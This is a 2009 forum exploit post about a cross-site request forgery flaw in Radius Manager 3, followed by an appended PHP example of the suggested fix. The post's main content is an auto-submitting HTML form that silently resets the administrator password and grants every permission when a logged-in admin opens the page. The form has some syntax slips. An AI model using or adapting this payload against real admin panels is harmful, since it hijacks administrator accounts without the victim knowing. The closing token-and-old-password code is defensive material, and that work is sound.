Radius Manager 3 ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Author : Bug Researchers/DaiMon
Date : 18.04.2009 16:19:02
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Radius Manager 3 # XSRF
# Vulnerable Type : XSRF
# Infection : The admin password can be changed remotely and automatically.
# Bug Fix Advice : A session key (session token) should be added to the form, and the old password should be asked for.
# author : Bug Researchers/DaiMon
# Script Price : $99,00!
############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >
<b0dy onLoad=Submit();>
<script>function Submit[]{document.DaiMon.submit();}</script>
<form name=form1 action=admin.php?cont=update_manager&managername=admin method=post>
<td colspan=5 class=normal><strong>admin</strong></td>
<td colspan=5 class=normal><input name=enablemanager type=checkbox id=enablemanager value=1 checked>
<td colspan=5 class=normal><input name=password1 type=password class=normal id=password1 value=DaiMon maxlength=32 size=18>
<td colspan=5 class=normal><input name=password2 type=password class=normal id=password2 value=DaiMon maxlength=32 size=18>
<input name=perm_listusers type=checkbox id=perm_listusers value=1 checked></td>
<input name=perm_listmanagers type=checkbox id=perm_listmanagers value=1 checked>
<input name=perm_listservices type=checkbox id=perm_listservices value=1 checked>
<input name=perm_createusers type=checkbox id=perm_createusers value=1 checked>
<input name=perm_createmanagers type=checkbox id=perm_createmanagers value=1 checked>
<input name=perm_createservices type=checkbox id=perm_createservices value=1 checked>
<input name=perm_editusers type=checkbox id=perm_editusers value=1 checked>
<input name=perm_editmanagers type=checkbox id=perm_editmanagers value=1 checked>
<input name=perm_editservices type=checkbox id=perm_editservices value=1 checked>
<input name=perm_deleteusers type=checkbox id=perm_deleteusers value=1 checked>
<input name=perm_deletemanagers type=checkbox id=perm_deletemanagers value=1 checked>
<input name=perm_deleteservices type=checkbox id=perm_deleteservices value=1 checked>
<input name=perm_listinvoices type=checkbox id=perm_listinvoices value=1 checked>
<input name=perm_listonlineusers type=checkbox id=perm_listonlineusers value=1 checked>
<input name=perm_listallinvoices type=checkbox id=perm_listallinvoices value=1 checked>
<input name=perm_logout type=checkbox id=perm_logout value=1 checked>
<input name=perm_editinvoice type=checkbox id=perm_editinvoice value=1 checked>
<input name=perm_addcredits type=checkbox id=perm_addcredits value=1 checked>
<input name=perm_listpayouts type=checkbox id=perm_listpayouts value=1 checked>
<input name=perm_trafficreport type=checkbox id=perm_trafficreport value=1 checked>
<input name=perm_makepayouts type=checkbox id=perm_makepayouts value=1 checked>
<input name=perm_cardsys type=checkbox id=perm_cardsys value=1 checked>
<input type=submit name=Submit value=update manager>
< -- bug code end of -- >
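
The two controls named under "Bug Fix Advice" (a session token in the form, and asking for the old password), sketched in PHP as an added example; this is not Radius Manager's code and not the author's. The function names, the csrf_token and oldpassword field names and the session array layout are assumptions; password1 and password2 are the field names from the form above.

```php
<?php
// Added example: hypothetical handler logic, not Radius Manager source.
// csrf_token / oldpassword and the $session layout are assumed names.

// Issue one unpredictable token per session; the admin form embeds it
// as a hidden field next to password1 / password2.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Validate a manager-update POST. Returns [bool ok, string reason].
function check_update_request(array $session, array $post, string $storedHash): array {
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // A page on another origin cannot read the admin's session,
    // so it cannot supply this value. Compare in constant time.
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return [false, 'csrf token missing or wrong'];
    }
    // Second control from the advisory: re-authenticate with the old password.
    $old = $post['oldpassword'] ?? '';
    if (!is_string($old) || !password_verify($old, $storedHash)) {
        return [false, 'old password wrong'];
    }
    $p1 = $post['password1'] ?? '';
    $p2 = $post['password2'] ?? '';
    if (!is_string($p1) || $p1 === '' || $p1 !== $p2) {
        return [false, 'new passwords empty or do not match'];
    }
    return [true, 'ok'];
}

// Constructed demo data; run from the CLI with: php example.php
$session = [];
$hash    = password_hash('current-secret', PASSWORD_DEFAULT);
$token   = issue_csrf_token($session);

// Same shape as the cross-site form above: no token, no old password.
$forged  = ['password1' => 'x', 'password2' => 'x'];
// Request submitted from the genuine admin form.
$genuine = ['csrf_token' => $token, 'oldpassword' => 'current-secret',
            'password1' => 'new-secret', 'password2' => 'new-secret'];

echo 'forged:  ', check_update_request($session, $forged, $hash)[1], PHP_EOL;
echo 'genuine: ', check_update_request($session, $genuine, $hash)[1], PHP_EOL;
```

The same token check belongs on every state-changing admin.php action, since the form above also sets the perm_* permission flags in the same request.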